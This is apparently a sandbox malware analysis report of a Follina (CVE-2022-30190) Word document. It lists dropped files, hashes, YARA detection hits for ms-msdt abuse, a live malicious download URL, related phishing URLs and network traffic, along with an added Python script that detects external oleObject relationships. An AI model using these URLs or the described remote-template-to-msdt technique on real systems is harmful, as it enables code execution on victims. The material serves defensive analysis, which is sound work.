                                                                                                                                                              https://haringlocati.com/Get hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              #Ud83d#Udd0a VN133184-112 .htmGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              https://online.pubhtml5.com/iuki/lvxf/Get hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              https://sergeandjonesconstruction.com/CTC/Get hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              https://hmrmicrosoftupdatecatalog.boxmode.io/Get hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              https://clt1439401.bmetrack.com/c/l?u=DC69C61&e=14461D7&c=15F6A9&t=1&l=7D4D8F67&email=89jMSQHVSHBwfz8oN8sDeXzBjzlZ2TJR&seq=1#YXNoYXJtYUBjb25kZW5hc3QuY29tGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              http://6IArJbN.media.yildirimyapimimarlik.com.#.aHR0cHM6Ly82SUFySmJOLmhha2lmbS5vci5rZSNkYXZpZC5nYWx2ZXpAc2t5YWlybGluZS5jb20=Get hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              https://lekig68557.clickfunnels.com/optinzn11mjrtGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              lnvoice#75229.htmlGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              https://ezaki-lab.littlestar.jp/2022DCON/service/sar/clients/cc.php?verificationGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              Statement-98659-34.htmGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              Storage Settings.htmlGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              https://linktr.ee/paul.kennedyGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              https://www.evernote.com/shard/s745/sh/a8d8ce86-17ac-3321-0033-db5bac47f516/20e24f82ca6a653fbe24ec592a54a552Get hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              No context
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: Microsoft Access Database
Category: dropped
Size (bytes): 528384
Entropy (8bit): 0.47626507928862705
Encrypted: false
SSDEEP: 384:xGfXucJCIG8SFifZ0jGBwehKW8wtZ1IEj+hVZO4Fg:0fXnCZHOZmC18/EQI
MD5: 521477A5B543DCDBDF650506A2BEF2FB
SHA1: 7396544D2B6EB329AA33FE532F23ADDEE7B26C3C
SHA-256: BD9D10557EBF81AEEAE73A07771E9B212F8F574AA1814AE50CF135FD813DC71A
SHA-512: 91B1F89180A11D9D0465CC39EE9A1333972C1AEA6B814862192322B16A44DF32DE2D997515367FC02036061728AB9AEA0D834EAE2C3B67A1E36815E2BF376077
Malicious: false
Reputation: low
                                                                                                                                                              Preview:....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...N-U.7...m.(...`.:{6^...Z.Cd..3..y[9.|*..|..... ..(..f_...$.g..'D...e....F.x....-b.T...4.0.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 36
Entropy (8bit): 2.730660070105504
Encrypted: false
SSDEEP: 3:5NixJlElGUR:WrEcUR
MD5: 1F830B53CA33A1207A86CE43177016FA
SHA1: BDF230E1F33AFBA5C9D5A039986C6505E8B09665
SHA-256: EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
SHA-512: 502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
Malicious: false
Reputation: moderate, very likely benign file
Preview: C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.3860360556164644
Encrypted: false
SSDEEP: 3:gdNSlNdaV:gG3u
MD5: 705034BCC0EEF9FEDF492547A6248FDA
SHA1: 582882F32AA3B4408443539B678D466383E7EBF7
SHA-256: 19EC0E986BD9E829EE6FEB3FDFC5C52BBC0417294BF64EE33DF5D026E9C68F97
SHA-512: 573B3B7328EB8875DDE1513A444D334CC07C1271766C064FCC396DCB337B1298888D23B0752CA1F927A2126AAAE6F1F3CD962E4E1BCCD4EE51C36DA7C0B064BB
Malicious: false
Reputation: low
Preview: 768287. Admin.
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 147863
Entropy (8bit): 5.35893694438743
Encrypted: false
SSDEEP: 1536:CcQW/gxgB5BQguw//Q9DQW+zQWk4F77nXmvidQXxUETLKz6e:9HQ9DQW+zIXLI
MD5: CAD3616610DB963271F887DD70CC2E8F
SHA1: C24CC92A07D0846DD80F694620B9D17D765071F8
SHA-256: 42F5BE14C77E0DDA5B870FFD88C8C03E9D43E6E630F125B1C2F1CE03CF98C9A6
SHA-512: E857B825E8592E7593CEF517BBE22514B873216664DA01980117B0E7580D0F70A0DC6D28FD009D7C84240E7EB403FE4AFA82FD87D942B9C5D84A3370C5DC9D90
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-06-03T21:03:08">.. Build: 16.0.15330.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: HTML document, ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 5092
Entropy (8bit): 1.5689266993578892
Encrypted: false
SSDEEP: 12:hPlf7fguuuuuuuuuuuuuuuuuuuuuuuuuuuuuuyxH8d2GZfgGwf80K2GUJU6+LtSm:hP12dlRg7nfG/bLtF0ooS34BM3
MD5: DA03F3022C8E3A07A6F196216B29135E
SHA1: 1F12DE0F50FF34CDB1C1BD99BCA553F7192FA416
SHA-256: 87E5A464DE2F85A500F1B8D1028F5742F0903D9C0C3387DC572AAC8CF9027BCC
SHA-512: 9E039948E2706E864656E1EE2D1CC659F60DC24A5964D220DA4409CCDC7815197F6E3636EC5CA43915BE70DA0A88888BE55B3EAA1F1AC828265D771145EF495E
Malicious: true
Yara Hits:
• Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8EA7015A.htm, Author: Tobias Michalski, Christian Burkard
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8EA7015A.htm, Author: Joe Security
Reputation: low
                                                                                                                                                              Preview:<!DOCTYPE html>..<html>..<body>.. <script>.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 4980
Entropy (8bit): 3.8087894377622136
Encrypted: false
SSDEEP: 48:cqZDMN7gsdBgLfVTped//HksYHGui3DAjG6kpJoApdHk/O:cqi7lBSTped//qH3i3DAqXLE/O
MD5: 5B29927367C1C2BEBE25499E5602DE05
SHA1: 10EB42142920A3299851F183D624731B910C6FCE
SHA-256: 820E5CFE32DD64E31AEE40837BC3730B1B0F810787A7D3AAFC700191E6551C68
SHA-512: CD1E48056BDCBDD8CE2C0B7C8E15CA645D26FF372CA68D20D6B3078580943D4D5FA68FEE84A0C1AAC86F275ACE0059A3F76C2AF402EEC918C6680549BAB2C2EC
Malicious: false
Reputation: low
Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=0], progressive, precision 8, 750x500, frames 3
Category:dropped
Size (bytes):91933
Entropy (8bit):7.9892937833237845
Encrypted:false
SSDEEP:1536:7JCBhGCgBEFzvY1kH0R1ngxcrXo3N0rKL1nvFhbbrC3PJ4+6JaZB5:UBkCgBEZPml3rY3NBpvFRbAhOJi5
MD5:A53C5995856D35B0097F80E38D258D33
SHA1:31099B09DCCAC8C4A1BAA7E1F1B14E6C80FC516F
SHA-256:E87E50F77EEC96A1F0E37FCA345001474B3A023EAABC8DBE6FB1989DCFCDA543
SHA-512:92C0748B624D9C2C8941C7720EF34C7EF7793589C19517FA4AAAF40C5BE3DCDE3F7C601D1D2B142AED5EFA92E50E5B449B2A61AAB96D22FBBF2B2C9F0EEFA1F6
Malicious:false
Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):5092
Entropy (8bit):1.5689266993578892
Encrypted:false
SSDEEP:12:hPlf7fguuuuuuuuuuuuuuuuuuuuuuuuuuuuuuyxH8d2GZfgGwf80K2GUJU6+LtSm:hP12dlRg7nfG/bLtF0ooS34BM3
MD5:DA03F3022C8E3A07A6F196216B29135E
SHA1:1F12DE0F50FF34CDB1C1BD99BCA553F7192FA416
SHA-256:87E5A464DE2F85A500F1B8D1028F5742F0903D9C0C3387DC572AAC8CF9027BCC
SHA-512:9E039948E2706E864656E1EE2D1CC659F60DC24A5964D220DA4409CCDC7815197F6E3636EC5CA43915BE70DA0A88888BE55B3EAA1F1AC828265D771145EF495E
Malicious:true
Yara Hits:
• Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F640E46C.htm, Author: Tobias Michalski, Christian Burkard
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F640E46C.htm, Author: Joe Security
Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):1536
Entropy (8bit):1.312888549670333
Encrypted:false
SSDEEP:6:W4ofylIcElClbYS7plQalvbK/SterHr4PxZUttrasD3B9d4XsDRv1:9oal7MClc2HK/rLGZmra4Bn4X6N
MD5:451EC25F416BC912608235442FF2F166
SHA1:F888C9778D1C7EBF3866D0C58500DB59171DCBB3
SHA-256:334A4E952D4B5D75EEB8A85978592B6DA7147803188641EECF69A7A4726E858A
SHA-512:2F871BFB230404A4718D1AB1C96DB79EB617DE4689B2B7957246F5E12143E1688C0CC54B81DF214818F31463D4FC33E4F23D104F7D65424B335867B824457F1D
Malicious:false
                                                                                                                                                              Preview:..M.O.T.D.............L.I.N.K. .P.a.c.k.a.g.e. .".h.t.t.p.s.:././.c.y.b.e.r.l.e.a.g.u.e...c.o./.t.h.1.s...h.t.m.l.!.". .".". .\.b..... . ...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):1024
Entropy (8bit):0.05390218305374581
Encrypted:false
SSDEEP:3:ol3lYdn:4Wn
MD5:5D4D94EE7E06BBB0AF9584119797B23A
SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:false
Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:downloaded
Size (bytes):5092
Entropy (8bit):1.5689266993578892
Encrypted:false
SSDEEP:12:hPlf7fguuuuuuuuuuuuuuuuuuuuuuuuuuuuuuyxH8d2GZfgGwf80K2GUJU6+LtSm:hP12dlRg7nfG/bLtF0ooS34BM3
MD5:DA03F3022C8E3A07A6F196216B29135E
SHA1:1F12DE0F50FF34CDB1C1BD99BCA553F7192FA416
SHA-256:87E5A464DE2F85A500F1B8D1028F5742F0903D9C0C3387DC572AAC8CF9027BCC
SHA-512:9E039948E2706E864656E1EE2D1CC659F60DC24A5964D220DA4409CCDC7815197F6E3636EC5CA43915BE70DA0A88888BE55B3EAA1F1AC828265D771145EF495E
Malicious:true
Yara Hits:
• Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\th1s[1].htm, Author: Tobias Michalski, Christian Burkard
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\th1s[1].htm, Author: Joe Security
IE Cache URL:https://cyberleague.co/th1s.html
Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:31:43 2022, mtime=Sat Jun 4 05:03:25 2022, atime=Sat Jun 4 05:03:05 2022, length=199522, window=hide
Category:dropped
Size (bytes):1080
Entropy (8bit):4.662475618409437
Encrypted:false
SSDEEP:12:8JU0UQuElPCH2bQtfiYIeF+WVBUWQqAjAsg/2KYDwG5y35yp4t2Y+xIBjKZm:8+3t75BUBtAsgmDwj67aB6m
MD5:1A876E870976DC0047C960C625D6B81F
SHA1:E7CE531CEA5DF1032015A4C6B6F6A5512CB94918
SHA-256:816BBF82C865204A0FA8BC08FABD97B3E0ED6FC4D45E8D26BC2B8B956E592B6B
SHA-512:B978B808E8712EFD9B2DC27265915BB5ACCBF59148C2FF1DAC9CC9CBADC226DC289494297142C4E0D078DA38B22330C87270251EB5F8C7643A88FE776631C355
Malicious:true
Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):96
Entropy (8bit):4.639669008145431
Encrypted:false
SSDEEP:3:bDuMJlHDInDdrFomxWIMovPDInDdrFov:bCBzNczy
MD5:C5F054026C8061C622BB0F1DAB7A99B0
SHA1:BD0930F6F9CF853909D7FDE6ED4690A517D456A3
SHA-256:E3805EFA3C64718616E0376881EA4E39FD164075412D0485F345138120AD9853
SHA-512:15D8C875F424C633DCE521147A2583E3AC93D749B4E5771C64802488F0F04DFD405458AF5B235857BD94ADC326A06765A5968BDB516754E87536ED8C51EACB89
Malicious:false
Preview:[folders]..Templates.LNK=0..20220531_180800.rtf.LNK=0..[misc??????]..20220531_180800.rtf.LNK=0..
Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):2.1027108526921086
Encrypted:false
SSDEEP:3:Rl/ZdfXGMl9/nTRdttl/dptJ:RtZdWMldTRXdptJ
MD5:0182DAC577AA3F876A2B371C3476C9DB
SHA1:19149426C4E2513AE4D18C4CDD213B31CD04C4DF
SHA-256:AC5A33C45B852FEFAC49BA2A7E5808EF599902722B6A11E8FFF9310DFDA058F2
SHA-512:A6196D173F73408376470CC011FBCE00B27B53A40F4EF4C1AEF0AA43FEBF435B9036149B57A7E8DACF50568DF354EF527C74E7CEB87110ECA1D56D1077EE831A
Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):162
                                                                                                                                                              Entropy (8bit):2.1027108526921086
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Rl/ZdfXGMl9/nTRdttl/dptJ:RtZdWMldTRXdptJ
                                                                                                                                                              MD5:0182DAC577AA3F876A2B371C3476C9DB
                                                                                                                                                              SHA1:19149426C4E2513AE4D18C4CDD213B31CD04C4DF
                                                                                                                                                              SHA-256:AC5A33C45B852FEFAC49BA2A7E5808EF599902722B6A11E8FFF9310DFDA058F2
                                                                                                                                                              SHA-512:A6196D173F73408376470CC011FBCE00B27B53A40F4EF4C1AEF0AA43FEBF435B9036149B57A7E8DACF50568DF354EF527C74E7CEB87110ECA1D56D1077EE831A
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.pratesh................................................p.r.a.t.e.s.h.........+'qc.3........................../'uc-4..........................#'yc45..........T...
                                                                                                                                                              File type:Microsoft OOXML
                                                                                                                                                              Entropy (8bit):7.9948510704789975
                                                                                                                                                              TrID:
                                                                                                                                                              • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                                              • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                                              • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                                              File name:20220531_180800.rtf
                                                                                                                                                              File size:199522
                                                                                                                                                              MD5:7b9c8e08371550238fbcd7cee1c8087d
                                                                                                                                                              SHA1:ff8c9deb358b2d22aa086cf36406461e8e9978b2
                                                                                                                                                              SHA256:b93326f795459d836c277730058e9923ab5f9bfbcef32e1c951e4a0d7538f9f5
                                                                                                                                                              SHA512:962c4c0a48519ffa81a95771b25987cc6aeed4bb8737e1e5ab242233f849370d72675f08da3628270bad410659772f437209d7f02bed089b5a220f97314ec1f4
                                                                                                                                                              SSDEEP:3072:LP/BkCPAXydgrYOUIr0XX95JQ7Anr5w2wJLWsk2n3rYxNYlT+MaJis19s9k:b/qXySM3XtQMnrq2Jon3MfYoL19s9k
                                                                                                                                                              TLSH:7814131876E61EB9C60F3BB6B875A1076B9F0017EC14D2BF0C6065F98931964B670F8B
                                                                                                                                                              File Content Preview:PK..........!....iw...........[Content_Types].xml.T.n.0..W.? _#p.CUU!9t96..~.1.q.M...}.HQ........y..f........F.d..I...\.2%.....D>0.3i4.d..L'.7.......}J.!.GJ=_.b>1.4".q..<..Z.?Y..n8.....:... ..3.l-C....M.Lh.=5u.UJ..Rp.........(.....BJb$....@h.>..H_.*....n.
                                                                                                                                                              Icon Hash:74f4c4c6c1cac4d8
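The static information above is the first thing to check by hand: the file is named .rtf, but its type is Microsoft OOXML and its content preview starts with the ZIP signature "PK", so Word will open it as a docx, not as RTF. For CVE-2022-30190 documents the next thing to look at is the package's relationship parts, because the HTML stage is fetched through an oleObject relationship whose target is marked external. The script below is an added triage example, not code from the report or from Joe Sandbox: it identifies the real container from magic bytes, lists every external relationship in the package, and searches the package parts for an ms-msdt: URI. The document it analyses is constructed in memory, and the target URL in it is a placeholder.

```python
"""Static triage of a suspected CVE-2022-30190 (Follina) document.

Added example, not part of the sandbox report. Checks:
  1. extension versus real container (a ".rtf" that starts with "PK\x03\x04"
     is an OOXML ZIP, not RTF);
  2. relationships with TargetMode="External" in any .rels part, in particular
     an oleObject relationship, which is how the HTML stage is fetched;
  3. package parts that embed an ms-msdt: URI directly.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

ZIP_MAGIC = b"PK\x03\x04"          # OOXML (docx/xlsx/pptx) is a ZIP container
RTF_MAGIC = b"{\\rtf"              # a real RTF file starts with this control word
CFB_MAGIC = b"\xd0\xcf\x11\xe0"    # legacy OLE2 compound file (.doc/.xls)
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
MSDT_RE = re.compile(rb"ms-msdt:", re.IGNORECASE)


def container_type(data: bytes) -> str:
    """Identify the real container from magic bytes, ignoring the extension."""
    if data.startswith(ZIP_MAGIC):
        return "ooxml-zip"
    if data.startswith(RTF_MAGIC):
        return "rtf"
    if data.startswith(CFB_MAGIC):
        return "ole2-cfb"
    return "unknown"


def external_relationships(data: bytes) -> list:
    """Every relationship with TargetMode="External" in any .rels part."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "").lower() == "external":
                    hits.append({
                        "part": name,
                        "id": rel.get("Id"),
                        "type": (rel.get("Type") or "").rsplit("/", 1)[-1],
                        "target": rel.get("Target"),
                    })
    return hits


def msdt_parts(data: bytes) -> list:
    """Names of package parts that contain an ms-msdt: URI."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        return [n for n in z.namelist() if MSDT_RE.search(z.read(n))]


def triage(filename: str, data: bytes) -> dict:
    """Combine the three checks into one verdict dictionary."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    ctype = container_type(data)
    expected = {"rtf": "rtf", "docx": "ooxml-zip", "docm": "ooxml-zip", "doc": "ole2-cfb"}
    mismatch = ext in expected and expected[ext] != ctype
    result = {"extension": ext, "container": ctype, "extension_mismatch": mismatch,
              "external_rels": [], "msdt_parts": []}
    if ctype == "ooxml-zip":
        result["external_rels"] = external_relationships(data)
        result["msdt_parts"] = msdt_parts(data)
    result["suspicious"] = bool(
        mismatch
        or any(r["type"] == "oleObject" for r in result["external_rels"])
        or result["msdt_parts"]
    )
    return result


def build_sample_docx(target: str) -> bytes:
    """Constructed minimal OOXML package whose document.xml.rels carries an
    external oleObject relationship. The target is a placeholder, not a real URL."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
        'officeDocument/2006/relationships/styles" Target="styles.xml"/>'
        f'<Relationship Id="rId99" Type="{OLE_REL_TYPE}" Target="{target}" '
        'TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types xmlns='
                   '"http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", '<?xml version="1.0"?><w:document xmlns:w='
                   '"http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    print(triage("sample.rtf", build_sample_docx("http://example.invalid/stage.html!")))
```

The ms-msdt: search over the package is the weakest of the three checks: in the original Follina documents the URI lives in the HTML that the external relationship fetches, not in the docx itself, so an empty result there says nothing. The extension mismatch and the external oleObject relationship are what to act on.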
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Jun 3, 2022 23:03:12.042546988 CEST  49741        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:12.042619944 CEST  443          49741      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:12.042687893 CEST  49741        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:12.043098927 CEST  49741        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:12.043123007 CEST  443          49741      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:12.441701889 CEST  443          49741      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:12.441899061 CEST  49741        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:12.594789982 CEST  49741        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:12.594856024 CEST  443          49741      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:12.595130920 CEST  443          49741      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:12.597747087 CEST  49741        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:12.644520998 CEST  443          49741      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:12.826128006 CEST  443          49741      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:12.826225042 CEST  443          49741      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:12.826323032 CEST  49741        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:12.839334011 CEST  49741        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:12.839390993 CEST  443          49741      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:12.839407921 CEST  49741        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:12.839416027 CEST  443          49741      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:12.925065994 CEST  49744        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:12.925132036 CEST  443          49744      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:12.925210953 CEST  49744        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:12.926445961 CEST  49744        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:12.926471949 CEST  443          49744      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:13.308842897 CEST  443          49744      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:13.313462019 CEST  49744        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:13.313499928 CEST  443          49744      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:13.314897060 CEST  49744        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:13.314929008 CEST  443          49744      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:13.685409069 CEST  443          49744      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:13.685566902 CEST  443          49744      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:13.685663939 CEST  49744        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:13.685729027 CEST  443          49744      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:13.685750008 CEST  49744        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:13.685764074 CEST  443          49744      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:13.685776949 CEST  49744        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:13.685785055 CEST  443          49744      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:16.733316898 CEST  49746        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:16.733378887 CEST  443          49746      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:16.733489990 CEST  49746        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:16.733768940 CEST  49746        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:16.733787060 CEST  443          49746      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:17.141038895 CEST  443          49746      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:17.141642094 CEST  49746        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:17.141695976 CEST  443          49746      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:17.142771006 CEST  49746        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:17.142786026 CEST  443          49746      13.250.15.191  192.168.2.3
